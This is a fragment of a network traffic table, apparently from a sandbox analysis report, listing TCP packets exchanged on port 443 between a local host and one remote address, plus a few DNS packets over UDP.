                            Sep 21, 2024 16:23:24.360646009 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:24.360688925 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:24.360776901 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:24.361270905 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:24.361287117 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.010920048 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.011032104 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:25.047159910 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:25.047185898 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.048194885 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.083640099 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:25.131407976 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.647015095 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.647953033 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.648009062 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:25.648195028 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:25.648195028 CEST53553443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:25.648215055 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:25.648224115 CEST4435355313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:27.662987947 CEST53557443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:27.663034916 CEST4435355713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:27.663181067 CEST53557443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:27.678955078 CEST53557443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:27.679012060 CEST4435355713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:27.679405928 CEST53557443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.113682032 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.113729954 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:28.113806009 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.114228010 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.114243031 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:28.887188911 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:28.887283087 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.890991926 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.891000986 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:28.891808033 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:28.901412964 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:28.943397999 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:29.438128948 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:29.438985109 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:29.439167976 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:29.439167976 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:29.440704107 CEST53558443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:29.440721989 CEST4435355813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:31.430438995 CEST53560443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.430505991 CEST4435356013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:31.430645943 CEST53560443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.430824041 CEST53560443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.430881977 CEST4435356013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:31.430946112 CEST53560443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.534152031 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.534188986 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:31.534285069 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.534625053 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:31.534638882 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.469198942 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.469261885 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:32.470525026 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:32.470532894 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.470850945 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.472194910 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:32.519403934 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.848367929 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.849378109 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:32.849492073 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:32.849788904 CEST53561443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:32.849802017 CEST4435356113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:34.727083921 CEST53563443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.727135897 CEST4435356313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:34.727294922 CEST53563443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.727401972 CEST53563443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.727446079 CEST4435356313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:34.727602005 CEST53563443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.832864046 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.832901955 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:34.833026886 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.833414078 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:34.833431959 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:35.731695890 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:35.731786013 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:35.733299971 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:35.733309984 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:35.733547926 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:35.734863997 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:35.779398918 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:36.320600033 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:36.320873022 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:36.320945978 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:36.321048975 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:36.321072102 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:36.321088076 CEST53564443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:36.321094990 CEST4435356413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:38.350487947 CEST53566443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.350519896 CEST4435356613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:38.350632906 CEST53566443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.350929976 CEST53566443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.350956917 CEST4435356613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:38.351003885 CEST53566443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.512954950 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.513011932 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:38.513108969 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.513873100 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:38.513887882 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.334461927 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.334642887 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:39.336055994 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:39.336072922 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.336395025 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.337862968 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:39.379447937 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.958199024 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.961486101 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.961639881 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:39.961719990 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:39.961719990 CEST53567443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:39.961740971 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:39.961780071 CEST4435356713.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:41.966726065 CEST53569443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:41.966773033 CEST4435356913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:41.966852903 CEST53569443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:41.966934919 CEST53569443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:41.967005968 CEST4435356913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:41.967057943 CEST53569443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.103127956 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.103161097 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:42.103283882 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.103648901 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.103662968 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:42.828783989 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:42.828885078 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.830183983 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.830199003 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:42.830482960 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:42.831711054 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:42.879426003 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:43.447241068 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:43.447531939 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:43.447638035 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:43.447772026 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:43.447772026 CEST53570443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:43.447792053 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:43.447803974 CEST4435357013.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:45.300878048 CEST53572443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.300947905 CEST4435357213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:45.301075935 CEST53572443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.301444054 CEST53572443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.301497936 CEST4435357213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:45.301562071 CEST53572443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.504187107 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.504228115 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:45.504353046 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.505786896 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:45.505798101 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.101681948 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.101994991 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:46.104542971 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:46.104573011 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.105046988 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.106343985 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:46.147402048 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.681401014 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.681715965 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.681790113 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:46.681900978 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:46.681924105 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:46.681938887 CEST53573443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:46.681948900 CEST4435357313.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:48.544550896 CEST53575443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.544590950 CEST4435357513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:48.544681072 CEST53575443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.544923067 CEST53575443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.544979095 CEST4435357513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:48.545042992 CEST53575443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.670192003 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.670223951 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:48.670382023 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.670825005 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:48.670838118 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.289691925 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.289854050 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:49.291420937 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:49.291431904 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.291812897 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.293056011 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:49.335405111 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.850903034 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.851475000 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.851533890 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:49.851636887 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:49.851665974 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:49.851690054 CEST53576443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:49.851696968 CEST4435357613.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:51.796361923 CEST53578443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.796381950 CEST4435357813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:51.796487093 CEST53578443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.797434092 CEST53578443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.797493935 CEST4435357813.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:51.798500061 CEST53578443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.920689106 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.920711040 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:51.920790911 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.921406031 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:51.921416998 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:52.518673897 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:52.518754005 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:52.520091057 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:52.520113945 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:52.520519018 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:52.521683931 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:52.567404032 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:53.079168081 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:53.079284906 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:53.079334021 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:53.083292007 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:53.083292007 CEST53579443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:53.083311081 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:53.083324909 CEST4435357913.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:54.880006075 CEST53581443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.880053997 CEST4435358113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:54.880132914 CEST53581443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.880235910 CEST53581443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.880266905 CEST4435358113.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:54.880321026 CEST53581443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.991374016 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.991405010 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:54.991558075 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.991904020 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:54.991955996 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:55.693032026 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:55.693248987 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:55.694688082 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:55.694705963 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:55.694973946 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:55.696263075 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:55.743396997 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:56.236582041 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:56.236901045 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:56.237013102 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:56.237071991 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:56.237108946 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:56.237121105 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:56.237128019 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.114625931 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.114660978 CEST4435358413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.114777088 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.115020990 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.115081072 CEST4435358413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.115153074 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.284610987 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.284638882 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.284714937 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.285059929 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.285075903 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.869296074 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.870172977 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.871256113 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.871265888 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.871540070 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.872730017 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.919411898 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.421526909 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.421636105 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.421731949 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:59.477416039 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:59.477447033 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.477463961 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:59.477473021 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.366525888 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.366550922 CEST4435358713.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.366636038 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.366770983 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.366802931 CEST4435358713.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.366847038 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.517823935 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.517858028 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.517951965 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.518346071 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.518366098 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.180515051 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.180659056 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:02.182070971 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:02.182079077 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.182317019 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.184201002 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:02.227406025 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586579084 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586688042 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586781979 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:03.586895943 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:03.586916924 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586930037 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:03.586935997 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.336301088 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.336350918 CEST4435359013.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.336447001 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.336590052 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.336628914 CEST4435359013.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.336843014 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.459408998 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.459459066 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.459592104 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.460030079 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.460061073 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.045290947 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.046449900 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.047405958 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.047416925 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.047669888 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.049869061 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.095402002 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.923743010 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.923845053 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.923922062 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.924048901 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.924073935 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.924088001 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.924093008 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.790440083 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.790482044 CEST4435359313.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.790550947 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.790694952 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.790743113 CEST4435359313.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.790797949 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898009062 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898040056 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.898140907 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898538113 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898550034 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.598289967 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.598411083 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:09.599793911 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:09.599817038 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.600153923 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.601372004 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:09.647407055 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.156672955 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.156759977 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.156857967 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:10.159375906 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:10.159377098 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:10.159404993 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.159415007 CEST4435359413.107.137.11192.168.2.8

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 21, 2024 16:22:18.557076931 CEST5376953192.168.2.81.1.1.1
                            Sep 21, 2024 16:22:38.913187981 CEST5362502162.159.36.2192.168.2.8
                            Sep 21, 2024 16:22:39.434202909 CEST5006953192.168.2.81.1.1.1
                            Sep 21, 2024 16:22:39.441749096 CEST53500691.1.1.1192.168.2.8
                            Sep 21, 2024 16:22:42.526303053 CEST5711453192.168.2.81.1.1.1
                            Sep 21, 2024 16:22:42.706172943 CEST53571141.1.1.1192.168.2.8
                            Sep 21, 2024 16:22:45.347551107 CEST5693353192.168.2.81.1.1.1
                            Sep 21, 2024 16:23:24.352066994 CEST6491353192.168.2.81.1.1.1
                            Sep 21, 2024 16:24:01.508694887 CEST5044053192.168.2.81.1.1.1

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
